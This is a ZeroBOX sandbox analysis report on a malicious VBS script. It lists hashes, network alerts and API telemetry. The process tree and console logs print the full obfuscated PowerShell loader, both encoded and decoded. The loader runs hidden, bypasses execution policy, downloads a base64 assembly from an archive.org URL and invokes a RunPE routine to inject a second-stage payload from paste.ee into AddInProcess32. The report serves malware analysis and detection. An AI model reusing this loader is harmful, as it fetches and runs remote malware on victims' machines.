Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Sept. 24, 2024, 10:49 a.m.	Sept. 24, 2024, 11:02 a.m.

Size	499.7KB
Type	Little-endian UTF-16 Unicode text, with CRLF line terminators
MD5	`4a31a1de3d99c80d908ddda051e2f761`
SHA256	`8140d8019e144b3998a9fc991c45be89eb5f83c58f04627ce34c49b3f8d5d368`
CRC32	`31A3AC43`
ssdeep	`12288:W5Fy+b4KOMEA35NC3O6xGYIWO2hnf/us6fM/cgXruE528e7XRPa2d+dbw3Td57g:Wu+GGGxv/HL8o`
Yara	None matched

wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\asegurar.vbs
2572
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoKFZBUklhQkxlICcqTURyKicpLm5hTWVbMywxMSwyXS1qT2lOJycpKCAoJ3cxJysnWnVybCA9IFZ3M2h0dHAnKydzOi8vJysnaScrJ2E2JysnMDAxMDAudXMuYXJjaGl2ZS5vcmcnKycvMjQnKycvaScrJ3RlbXMvZGV0JysnYWgtJysnbm90ZS12LycrJ0RldGFoTm8nKyd0ZVYudHgnKyd0VnczOycrJ3cxWmJhc2U2JysnNEMnKydvbnRlJysnbnQgPSAoTmV3JysnLU9iaicrJ2VjdCAnKydTeScrJ3N0ZW0uTmV0JysnLlcnKydlYkNsaWVudCkuRG93bmxvYWRTJysndHJpbmcnKycodzFadXJsKTt3JysnMVpiJysnaW4nKydhcicrJ3lDb250ZW50ID0gWycrJ1N5Jysnc3RlbS5DJysnb24nKyd2JysnZXJ0JysnXTo6RicrJ3InKydvbUJhcycrJ2U2NFN0cmluZycrJyh3MVpiYXNlNicrJzRDb250ZScrJ250KTt3MVphc3NlbWJseSA9IFsnKydSZWZsZWN0JysnaScrJ29uLkFzJysnc2VtYmx5XScrJzo6TG9hZCcrJygnKyd3MVonKydiaW5hcnlDb24nKyd0ZW50JysnKTt3MVp0JysneXBlID0gdzFaYXNzJysnZW1iJysnbHkuR2V0VHlwJysnZShWdzMnKydSdScrJ25QRS4nKydIb21lJysnVnczKTt3JysnMVptZXRob2QgPSB3JysnMVonKyd0eScrJ3BlLkdldE1ldGhvZChWdzNWQUlWdzMpO3cxWm0nKydldGgnKydvZCcrJy5JbnZva2UodycrJzFabnVsbCwgJysnWycrJ29iamVjdFtdJysnXUAoVicrJ3czMC9wV2NKJysnbicrJy9kLycrJ2UnKydlLmV0c2FwLy86c3B0dGhWdzMgLCcrJyBWdzNkZXNhdGl2YScrJ2RvVnczICwgJysnVicrJ3czZGVzYXRpdmFkbycrJ1Z3JysnMyAsJysnIFZ3M2QnKydlcycrJ2EnKyd0aXZhZG9WJysndzMsVncnKyczQWRkSW5QJysncicrJ28nKydjZXNzMzJWdzMsJysnVicrJ3czVnczKSknKS5yZXBsQWNlKCdWdzMnLFtzVHJJTkddW0NIYVJdMzkpLnJlcGxBY2UoJ3cxWicsJyQnKSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
  2652
  - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ((VARIaBLe '*MDr*').naMe[3,11,2]-jOiN'')( ('w1'+'Zurl = Vw3http'+'s://'+'i'+'a6'+'00100.us.archive.org'+'/24'+'/i'+'tems/det'+'ah-'+'note-v/'+'DetahNo'+'teV.tx'+'tVw3;'+'w1Zbase6'+'4C'+'onte'+'nt = (New'+'-Obj'+'ect '+'Sy'+'stem.Net'+'.W'+'ebClient).DownloadS'+'tring'+'(w1Zurl);w'+'1Zb'+'in'+'ar'+'yContent = ['+'Sy'+'stem.C'+'on'+'v'+'ert'+']::F'+'r'+'omBas'+'e64String'+'(w1Zbase6'+'4Conte'+'nt);w1Zassembly = ['+'Reflect'+'i'+'on.As'+'sembly]'+'::Load'+'('+'w1Z'+'binaryCon'+'tent'+');w1Zt'+'ype = w1Zass'+'emb'+'ly.GetTyp'+'e(Vw3'+'Ru'+'nPE.'+'Home'+'Vw3);w'+'1Zmethod = w'+'1Z'+'ty'+'pe.GetMethod(Vw3VAIVw3);w1Zm'+'eth'+'od'+'.Invoke(w'+'1Znull, '+'['+'object[]'+']@(V'+'w30/pWcJ'+'n'+'/d/'+'e'+'e.etsap//:sptthVw3 ,'+' Vw3desativa'+'doVw3 , '+'V'+'w3desativado'+'Vw'+'3 ,'+' Vw3d'+'es'+'a'+'tivadoV'+'w3,Vw'+'3AddInP'+'r'+'o'+'cess32Vw3,'+'V'+'w3Vw3))').replAce('Vw3',[sTrING][CHaR]39).replAce('w1Z','$'))"
    2784

Name	Response	Post-Analysis Lookup
ia600100.us.archive.org	A 207.241.227.240	207.241.227.240

IP Address	Status	Action
164.124.101.2	Active	Moloch
207.241.227.240	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.101:49165 -> 207.241.227.240:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49166 -> 207.241.227.240:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined

Suricata TLS

No Suricata TLS

Queries for the computername (13 events)

Time & API	Arguments	Status	Return
GetComputerNameW Sept. 24, 2024, 10:49 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 24, 2024, 10:49 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 24, 2024, 10:49 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 24, 2024, 10:49 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Sept. 24, 2024, 10:49 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 24, 2024, 10:49 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 24, 2024, 10:49 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 24, 2024, 10:49 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 24, 2024, 10:49 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 24, 2024, 10:49 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Sept. 24, 2024, 10:49 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 24, 2024, 10:49 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 24, 2024, 10:49 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (2 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Sept. 24, 2024, 10:49 a.m.			0	0
IsDebuggerPresent Sept. 24, 2024, 10:49 a.m.			0	0

Command line console output was observed (50 out of 62 events)

Time & API	Arguments	Status	Return
WriteConsoleW Sept. 24, 2024, 10:49 a.m.	buffer: Exception calling "DownloadString" with "1" argument(s): "The underlying connec console_handle: 0x00000023	1	1
WriteConsoleW Sept. 24, 2024, 10:49 a.m.	buffer: tion was closed: An unexpected error occurred on a send." console_handle: 0x0000002f	1	1
WriteConsoleW Sept. 24, 2024, 10:49 a.m.	buffer: At line:1 char:144 console_handle: 0x0000003b	1	1
WriteConsoleW Sept. 24, 2024, 10:49 a.m.	buffer: + $url = 'https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt' console_handle: 0x00000047	1	1
WriteConsoleW Sept. 24, 2024, 10:49 a.m.	buffer: ;$base64Content = (New-Object System.Net.WebClient).DownloadString <<<< ($url); console_handle: 0x00000053	1	1
WriteConsoleW Sept. 24, 2024, 10:49 a.m.	buffer: $binaryContent = [System.Convert]::FromBase64String($base64Content);$assembly = console_handle: 0x0000005f	1	1
WriteConsoleW Sept. 24, 2024, 10:49 a.m.	buffer: [Reflection.Assembly]::Load($binaryContent);$type = $assembly.GetType('RunPE.H console_handle: 0x0000006b	1	1
WriteConsoleW Sept. 24, 2024, 10:49 a.m.	buffer: ome');$method = $type.GetMethod('VAI');$method.Invoke($null, [object[]]@('0/pWc console_handle: 0x00000077	1	1
WriteConsoleW Sept. 24, 2024, 10:49 a.m.	buffer: Jn/d/ee.etsap//:sptth' , 'desativado' , 'desativado' , 'desativado','AddInProce console_handle: 0x00000083	1	1
WriteConsoleW Sept. 24, 2024, 10:49 a.m.	buffer: ss32','')) console_handle: 0x0000008f	1	1
WriteConsoleW Sept. 24, 2024, 10:49 a.m.	buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException console_handle: 0x0000009b	1	1
WriteConsoleW Sept. 24, 2024, 10:49 a.m.	buffer: + FullyQualifiedErrorId : DotNetMethodException console_handle: 0x000000a7	1	1
WriteConsoleW Sept. 24, 2024, 10:49 a.m.	buffer: Exception calling "Load" with "1" argument(s): "Could not load file or assembly console_handle: 0x00000023	1	1
WriteConsoleW Sept. 24, 2024, 10:49 a.m.	buffer: '0 bytes loaded from System.Management.Automation, Version=1.0.0.0, Culture=ne console_handle: 0x0000002f	1	1
WriteConsoleW Sept. 24, 2024, 10:49 a.m.	buffer: utral, PublicKeyToken=31bf3856ad364e35' or one of its dependencies. An attempt console_handle: 0x0000003b	1	1
WriteConsoleW Sept. 24, 2024, 10:49 a.m.	buffer: was made to load a program with an incorrect format." console_handle: 0x00000047	1	1
WriteConsoleW Sept. 24, 2024, 10:49 a.m.	buffer: At line:1 char:258 console_handle: 0x00000053	1	1
WriteConsoleW Sept. 24, 2024, 10:49 a.m.	buffer: + $url = 'https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt' console_handle: 0x0000005f	1	1
WriteConsoleW Sept. 24, 2024, 10:49 a.m.	buffer: ;$base64Content = (New-Object System.Net.WebClient).DownloadString($url);$binar console_handle: 0x0000006b	1	1
WriteConsoleW Sept. 24, 2024, 10:49 a.m.	buffer: yContent = [System.Convert]::FromBase64String($base64Content);$assembly = [Refl console_handle: 0x00000077	1	1
WriteConsoleW Sept. 24, 2024, 10:49 a.m.	buffer: ection.Assembly]::Load <<<< ($binaryContent);$type = $assembly.GetType('RunPE.H console_handle: 0x00000083	1	1
WriteConsoleW Sept. 24, 2024, 10:49 a.m.	buffer: ome');$method = $type.GetMethod('VAI');$method.Invoke($null, [object[]]@('0/pWc console_handle: 0x0000008f	1	1
WriteConsoleW Sept. 24, 2024, 10:49 a.m.	buffer: Jn/d/ee.etsap//:sptth' , 'desativado' , 'desativado' , 'desativado','AddInProce console_handle: 0x0000009b	1	1
WriteConsoleW Sept. 24, 2024, 10:49 a.m.	buffer: ss32','')) console_handle: 0x000000a7	1	1
WriteConsoleW Sept. 24, 2024, 10:49 a.m.	buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException console_handle: 0x000000b3	1	1
WriteConsoleW Sept. 24, 2024, 10:49 a.m.	buffer: + FullyQualifiedErrorId : DotNetMethodException console_handle: 0x000000bf	1	1
WriteConsoleW Sept. 24, 2024, 10:49 a.m.	buffer: You cannot call a method on a null-valued expression. console_handle: 0x000000df	1	1
WriteConsoleW Sept. 24, 2024, 10:49 a.m.	buffer: At line:1 char:300 console_handle: 0x000000eb	1	1
WriteConsoleW Sept. 24, 2024, 10:49 a.m.	buffer: + $url = 'https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt' console_handle: 0x000000f7	1	1
WriteConsoleW Sept. 24, 2024, 10:49 a.m.	buffer: ;$base64Content = (New-Object System.Net.WebClient).DownloadString($url);$binar console_handle: 0x00000103	1	1
WriteConsoleW Sept. 24, 2024, 10:49 a.m.	buffer: yContent = [System.Convert]::FromBase64String($base64Content);$assembly = [Refl console_handle: 0x0000010f	1	1
WriteConsoleW Sept. 24, 2024, 10:49 a.m.	buffer: ection.Assembly]::Load($binaryContent);$type = $assembly.GetType <<<< ('RunPE.H console_handle: 0x0000011b	1	1
WriteConsoleW Sept. 24, 2024, 10:49 a.m.	buffer: ome');$method = $type.GetMethod('VAI');$method.Invoke($null, [object[]]@('0/pWc console_handle: 0x00000127	1	1
WriteConsoleW Sept. 24, 2024, 10:49 a.m.	buffer: Jn/d/ee.etsap//:sptth' , 'desativado' , 'desativado' , 'desativado','AddInProce console_handle: 0x00000133	1	1
WriteConsoleW Sept. 24, 2024, 10:49 a.m.	buffer: ss32','')) console_handle: 0x0000013f	1	1
WriteConsoleW Sept. 24, 2024, 10:49 a.m.	buffer: + CategoryInfo : InvalidOperation: (GetType:String) [], RuntimeEx console_handle: 0x0000014b	1	1
WriteConsoleW Sept. 24, 2024, 10:49 a.m.	buffer: ception console_handle: 0x00000157	1	1
WriteConsoleW Sept. 24, 2024, 10:49 a.m.	buffer: + FullyQualifiedErrorId : InvokeMethodOnNull console_handle: 0x00000163	1	1
WriteConsoleW Sept. 24, 2024, 10:49 a.m.	buffer: You cannot call a method on a null-valued expression. console_handle: 0x00000183	1	1
WriteConsoleW Sept. 24, 2024, 10:49 a.m.	buffer: At line:1 char:340 console_handle: 0x0000018f	1	1
WriteConsoleW Sept. 24, 2024, 10:49 a.m.	buffer: + $url = 'https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt' console_handle: 0x0000019b	1	1
WriteConsoleW Sept. 24, 2024, 10:49 a.m.	buffer: ;$base64Content = (New-Object System.Net.WebClient).DownloadString($url);$binar console_handle: 0x000001a7	1	1
WriteConsoleW Sept. 24, 2024, 10:49 a.m.	buffer: yContent = [System.Convert]::FromBase64String($base64Content);$assembly = [Refl console_handle: 0x000001b3	1	1
WriteConsoleW Sept. 24, 2024, 10:49 a.m.	buffer: ection.Assembly]::Load($binaryContent);$type = $assembly.GetType('RunPE.Home'); console_handle: 0x000001bf	1	1
WriteConsoleW Sept. 24, 2024, 10:49 a.m.	buffer: $method = $type.GetMethod <<<< ('VAI');$method.Invoke($null, [object[]]@('0/pWc console_handle: 0x000001cb	1	1
WriteConsoleW Sept. 24, 2024, 10:49 a.m.	buffer: Jn/d/ee.etsap//:sptth' , 'desativado' , 'desativado' , 'desativado','AddInProce console_handle: 0x000001d7	1	1
WriteConsoleW Sept. 24, 2024, 10:49 a.m.	buffer: ss32','')) console_handle: 0x000001e3	1	1
WriteConsoleW Sept. 24, 2024, 10:49 a.m.	buffer: + CategoryInfo : InvalidOperation: (GetMethod:String) [], Runtime console_handle: 0x000001ef	1	1
WriteConsoleW Sept. 24, 2024, 10:49 a.m.	buffer: Exception console_handle: 0x000001fb	1	1
WriteConsoleW Sept. 24, 2024, 10:49 a.m.	buffer: + FullyQualifiedErrorId : InvokeMethodOnNull console_handle: 0x00000207	1	1

Uses Windows APIs to generate a cryptographic key (50 out of 86 events)

Time & API	Arguments	Status	Return
CryptExportKey Sept. 24, 2024, 10:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0041d518 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 24, 2024, 10:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0041ddd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 24, 2024, 10:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0041ddd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 24, 2024, 10:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0041ddd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 24, 2024, 10:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0041d498 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 24, 2024, 10:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0041d498 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 24, 2024, 10:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0041d498 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 24, 2024, 10:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0041d498 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 24, 2024, 10:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0041d498 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 24, 2024, 10:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0041d498 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 24, 2024, 10:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0041d858 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 24, 2024, 10:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0041d858 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 24, 2024, 10:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0041d858 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 24, 2024, 10:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0041ddd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 24, 2024, 10:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0041ddd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 24, 2024, 10:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0041ddd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 24, 2024, 10:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0041dad8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 24, 2024, 10:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0041ddd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 24, 2024, 10:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0041ddd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 24, 2024, 10:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0041ddd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 24, 2024, 10:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0041ddd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 24, 2024, 10:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0041ddd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 24, 2024, 10:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0041ddd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 24, 2024, 10:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0041ddd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 24, 2024, 10:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0041dfd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 24, 2024, 10:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0041dfd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 24, 2024, 10:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0041dfd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 24, 2024, 10:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0041dfd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 24, 2024, 10:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0041dfd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 24, 2024, 10:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0041dfd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 24, 2024, 10:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0041dfd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 24, 2024, 10:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0041dfd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 24, 2024, 10:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0041dfd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 24, 2024, 10:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0041dfd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 24, 2024, 10:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0041dfd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 24, 2024, 10:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0041dfd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 24, 2024, 10:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0041dfd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 24, 2024, 10:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0041dfd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 24, 2024, 10:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0041e058 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 24, 2024, 10:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0041e058 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 24, 2024, 10:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00371e38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 24, 2024, 10:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00372838 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 24, 2024, 10:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00372838 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 24, 2024, 10:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00372838 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 24, 2024, 10:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00371ef8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 24, 2024, 10:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00371ef8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 24, 2024, 10:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00371ef8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 24, 2024, 10:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00371ef8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 24, 2024, 10:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00371ef8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 24, 2024, 10:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00371ef8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Sept. 24, 2024, 10:49 a.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (50 out of 291 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Sept. 24, 2024, 10:49 a.m.	process_identifier: 2652 region_size: 1572864 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02910000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 24, 2024, 10:49 a.m.	process_identifier: 2652 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a50000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 24, 2024, 10:49 a.m.	process_identifier: 2652 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72891000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 24, 2024, 10:49 a.m.	process_identifier: 2652 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0266a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 24, 2024, 10:49 a.m.	process_identifier: 2652 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72892000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 24, 2024, 10:49 a.m.	process_identifier: 2652 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02662000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 24, 2024, 10:49 a.m.	process_identifier: 2652 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02672000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 24, 2024, 10:49 a.m.	process_identifier: 2652 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a51000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 24, 2024, 10:49 a.m.	process_identifier: 2652 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a52000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 24, 2024, 10:49 a.m.	process_identifier: 2652 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026da000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 24, 2024, 10:49 a.m.	process_identifier: 2652 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02673000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 24, 2024, 10:49 a.m.	process_identifier: 2652 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02674000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 24, 2024, 10:49 a.m.	process_identifier: 2652 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026eb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 24, 2024, 10:49 a.m.	process_identifier: 2652 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026e7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 24, 2024, 10:49 a.m.	process_identifier: 2652 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0266b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 24, 2024, 10:49 a.m.	process_identifier: 2652 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026d2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 24, 2024, 10:49 a.m.	process_identifier: 2652 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026e5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
